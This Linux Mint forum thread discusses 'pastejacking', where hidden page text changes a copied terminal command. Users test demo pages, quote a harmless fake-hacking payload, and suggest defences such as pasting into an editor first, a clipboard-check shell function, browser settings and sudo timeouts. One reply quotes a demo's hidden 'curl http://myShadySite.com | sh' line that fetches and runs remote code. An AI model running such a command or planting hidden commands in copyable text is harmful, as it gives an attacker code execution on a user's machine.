Possible Exploit with Copy/Paste to Terminal?
Possible Exploit with Copy/Paste to Terminal?
Here, perhaps, is an object lesson in the dangers of laziness when working with BASH or PowerShell or other terminal environments.
Command line stuff is often complicated and it is easy to make typos that are hard to see if you are tired, stressed and/or inexperienced, so people often copy commands from websites that offer instructions on how to do or fix something.
This copy/pasting of commands apparently can be exploited.
A techie friend, who brought this to my attention, has tested the (non-dangerous, not run as root) exploit demo outlined in the link below on his Android phone, and it works for him.
http://lifepluslinux.blogspot.com/2017/ ... te-to.html
This is cool in a worrisome sort of way. But I am pleased to say it doesn't work in my terminal on Linux Mint 20 copying from Vivaldi. I just get the normal output I would get from running ls -lat.
If I copy/paste the selection from the website into a text only app or paste without formatting into a word-processor app, I just get the text, ls -lat.
If I inspect the element, ls -lat, in the web page with Vivaldi's dev-tools, I can see that something is very wrong, but what is wrong seems not to copy/paste over.
Notwithstanding, I do copy/paste of command line code all the time. I guess I shouldn't be so lazy.
Last edited by LockBot on Wed Dec 28, 2022 7:16 am, edited 1 time in total.
Reason: Topic automatically closed 6 months after creation. New replies are no longer allowed.
Re: Possible Exploit with Copy/Paste to Terminal?
I tried both in Firefox and Chromium but neither copies invisible text so only the also in the browser visible "ls -lat" text is copied. I had to remove the "malicious" class from the span with the hidden text on the webpage to make it visible to be able to copy the (no longer) hidden text from Firefox or Chromium. Gnome Web did copy the text without having to make it visible.
I use Tilix as terminal and it prompted me with a warning when pasting the copied text with the malicious part in it:
Gnome Terminal just ran it. I guess Gnome Web and Gnome Terminal could do with some improvement.
Re: Possible Exploit with Copy/Paste to Terminal?
I just get ls -lat in two terminals, two browsers and leafpad. I pasted it into leafpad, saved it as ls.txt, and then
Code:
$ od -a ls.txt
0000000 l s sp - l a t
0000007
Please edit your original post title to include [SOLVED] if/when it is solved!
Your data and OS are backed up....right?
Re: Possible Exploit with Copy/Paste to Terminal?
Interesting.
I selected the text in Brave, and on right click I have the option to "Search Google for "ls;clear..." etc, but when choosing Copy, it only copied the ls -lat.
Re: Possible Exploit with Copy/Paste to Terminal?
There is nothing between ls and -lat for me, but I don't just allow every site script access. This is definitely worrisome though, if this is somehow catching people out. As if copy-pasting weren't problematic enough already.
BTW, the commands it was supposed to run are:
Code:
; clear; echo 'Haha! You gave me access to your computer with sudo!';
echo -ne 'h4cking ## (10%)\r';
sleep 0.3;
echo -ne 'h4cking ### (20%)\r';
sleep 0.3;
echo -ne 'h4cking ##### (33%)\r';
sleep 0.3;
echo -ne 'h4cking ####### (40%)\r';
sleep 0.3;
echo -ne 'h4cking ########## (50%)\r';
sleep 0.3;
echo -ne 'h4cking ############# (66%)\r';
sleep 0.3;
echo -ne 'h4cking ##################### (99%)\r';
sleep 0.3;
echo -ne 'h4cking ####################### (100%)\r';
echo -ne '\n';
echo 'Hacking complete.';
echo 'Use GUI interface using visual basic to track my IP'<br /> ls
I got it from the page's source.
I suppose you can avoid something like this catching you out by pasting first in an editor. That said, not everyone will understand what they're looking at.
I'm also Terminalforlife on GitHub.
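An added example, not part of any post in this thread: a shell function that automates the "paste into an editor first" check suggested above and the od inspection from the earlier reply. The function name inspect_paste and the two sample strings are assumptions made for this example; a non-zero return means "read the text before running it", not that the text is malicious.

```shell
# inspect_paste: read candidate clipboard text on stdin and report anything
# that would make a paste do more than the visible command suggests.
# Returns 0 if nothing was flagged, 1 if the text needs a manual read.
inspect_paste() {
    tmp=$(mktemp) || return 2
    cat > "$tmp"
    flagged=0

    # Newlines: each one acts as Enter if the terminal pastes the text raw.
    nl=$(tr -cd '\n' < "$tmp" | wc -c | tr -d ' ')
    if [ "$nl" -gt 0 ]; then
        echo "newline(s): $nl (text may run before you can review it)"
        flagged=1
    fi

    # Other control bytes (ESC, CR, backspace...) do not belong in a
    # command that was meant to be read.
    ctl=$(tr -d '\n\t' < "$tmp" | tr -cd '\000-\037\177' | wc -c | tr -d ' ')
    if [ "$ctl" -gt 0 ]; then
        echo "control byte(s): $ctl"
        flagged=1
    fi

    # Separators and substitutions mean more than one command is present.
    if grep -Eq '[;&|`]|\$\(' "$tmp"; then
        echo "command separator or substitution present"
        flagged=1
    fi

    # Show every byte, like the od check earlier in the thread.
    od -c "$tmp"
    rm -f "$tmp"
    return "$flagged"
}

# Constructed samples: the visible text, and the visible text with a
# shortened form of the hidden commands quoted in the post above.
visible='ls -lat'
hidden=$(printf "ls; clear; echo 'Haha!';\nls -lat")

printf '%s' "$visible" | inspect_paste && echo "visible text: nothing flagged"
printf '%s' "$hidden"  | inspect_paste || echo "hidden text: read before running"
```

On X11, `xclip -o -selection clipboard | inspect_paste` feeds it the real clipboard contents.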
- BenTrabetere
- Level 7
- Posts: 1890
- Joined: Sat Jul 19, 2014 12:04 am
- Location: Hattiesburg, MS USA
Re: Possible Exploit with Copy/Paste to Terminal?
The exploit did not work for me with Firefox and Gnome Terminal. I just got output from ls -lat.
The article claims, "This can be worse. If the code snippet had a command with sudo for instance, the malicious code will have sudo access too."
Please correct me if I am wrong, but if this was an exploit and the command had sudo, you would still have to enter your password in order for the command to work. Yes? (It upsets me to think that too many people would enter a password without hesitation.)
@Termy
+1 for pasting commands to a text editor before pasting to a terminal. I have been doing that for several years.
Patreon sponsor since August 2022
Re: Possible Exploit with Copy/Paste to Terminal?
BenTrabetere wrote: ⤴Mon Jan 25, 2021 12:04 am if this was an exploit and the command had sudo, you would still have to enter your password
Yes.
Re: Possible Exploit with Copy/Paste to Terminal?
One of the many things that I turn off in the Firefox about:config
dom.event.clipboardevents.enabled
https://briantracy.xyz/writing/copy-paste-shell.html
Re: Possible Exploit with Copy/Paste to Terminal?
Very nice! I'm going to incorporate a check for that into UbuChk. I really should have a whole Firefox section for it. Do you know of any other awesome parameters to change for security or as an optimization?
Also, do you know if this is specifically for Firefox, or something which will work for most Firefox-based browsers?
I'm also Terminalforlife on GitHub.
Re: Possible Exploit with Copy/Paste to Terminal?
dom.event.clipboardevents.enabled is 'true' in my Firefox so I would expect that website to do something scary but it doesn't?
When I copy the text in the red bar and paste it here, I do get this:
echo "this could have been [curl http://myShadySite.com | sh]"
But on the terminal it again only pastes the visible text:
echo "looks safe to me!"
And it also prints "looks safe to me!" and nothing more.
Re: Possible Exploit with Copy/Paste to Terminal?
Do you have scripting allowed for the page? You might actually have some other feature in place in your browser to protect against this. I use NoScript which blocks scripts unless I allow it.
I'm also Terminalforlife on GitHub.
Re: Possible Exploit with Copy/Paste to Terminal?
As I shared, it does change the copied text when pasting here:
xenopeek wrote: ⤴Thu Jan 28, 2021 10:12 am When I copy the text in the red bar and paste it here, I do get this: echo "this could have been [curl http://myShadySite.com | sh]"
Re: Possible Exploit with Copy/Paste to Terminal?
Oh yeah -- my bad. I misread.
I'm also Terminalforlife on GitHub.
Re: Possible Exploit with Copy/Paste to Terminal?
Termy wrote: ⤴Thu Jan 28, 2021 9:28 am
Very nice! I'm going to incorporate a check for that into UbuChk. I really should have a whole Firefox section for it. Do you know of any other awesome parameters to change for security or as an optimization?
Also, do you know if this is specifically for Firefox, or something which will work for most Firefox-based browsers?
Cool perl script project! The whole "Firefox about:config" is a topic unto itself. I have about 10 preferences set to false (unless otherwise specified) for personal preference and added security/privacy:
browser.backspace_action=2
geo.enabled
extensions.pocket.enabled
network.http.sendRefererHeader=0
browser.newtabpage.enabled
browser.urlbar.trimURLs
keyword.enabled
browser.fixup.alternate.enabled
media.autoplay.enabled
Here is a reference for many many more: https://github.com/arkenfox/user.js/blob/master/user.js
I also install uBlock Origin and uMatrix.
I use TenFourFox, a Firefox-based browser for PowerPC Mac, and the settings work the same as Firefox on Linux Mint. Some setting types change with newer and older versions of Firefox.
Re: Possible Exploit with Copy/Paste to Terminal?
Thank you muchly! I'll look into all of those. Very cool stuff.
Update:
From looking into this a bit and actually starting to add it to UbuChk, I've run into some walls. Firefox does NOT make this process easy. Might make a thread for this, to see if anyone has managed to do this successfully, plus I don't want to derail this thread. It might just not be viable for UbuChk, sadly.
Done, in case anyone is curious: viewtopic.php?f=213&t=341311
I'm also Terminalforlife on GitHub.
Re: Possible Exploit with Copy/Paste to Terminal?
xenopeek wrote: ⤴Mon Jan 25, 2021 3:53 am
BenTrabetere wrote: ⤴Mon Jan 25, 2021 12:04 am if this was an exploit and the command had sudo, you would still have to enter your password
Yes.
I realize I'm posting a month late to the discussion, but this may still be helpful to point out.
One thing about "sudo" use is that once you successfully use sudo in a terminal, you do not need to reenter your password to use it again for a set time (5 minutes?). Thus, if a user had recently run a sudo command, and then blindly pasted a malicious sudo command, it *could* run without re-asking for the password.
Re: Possible Exploit with Copy/Paste to Terminal?
Yeah -- the password (credentials, specifically) is cached for 15 minutes, by default; this is mentioned in the sudo(8) manual page. This can be adjusted, however, to be as long or short as you like, by editing the '/etc/sudoers' file. Look at the sudoers(5) manual page for information on how to change this:
man sudoers
I'm also Terminalforlife on GitHub.
Re: Possible Exploit with Copy/Paste to Terminal?
You can run sudo -k to reset that timer so next sudo command will ask the password again. Also, the timer is per session: if you open a new terminal, or a new tab in your terminal, the first sudo command on that will always ask the password.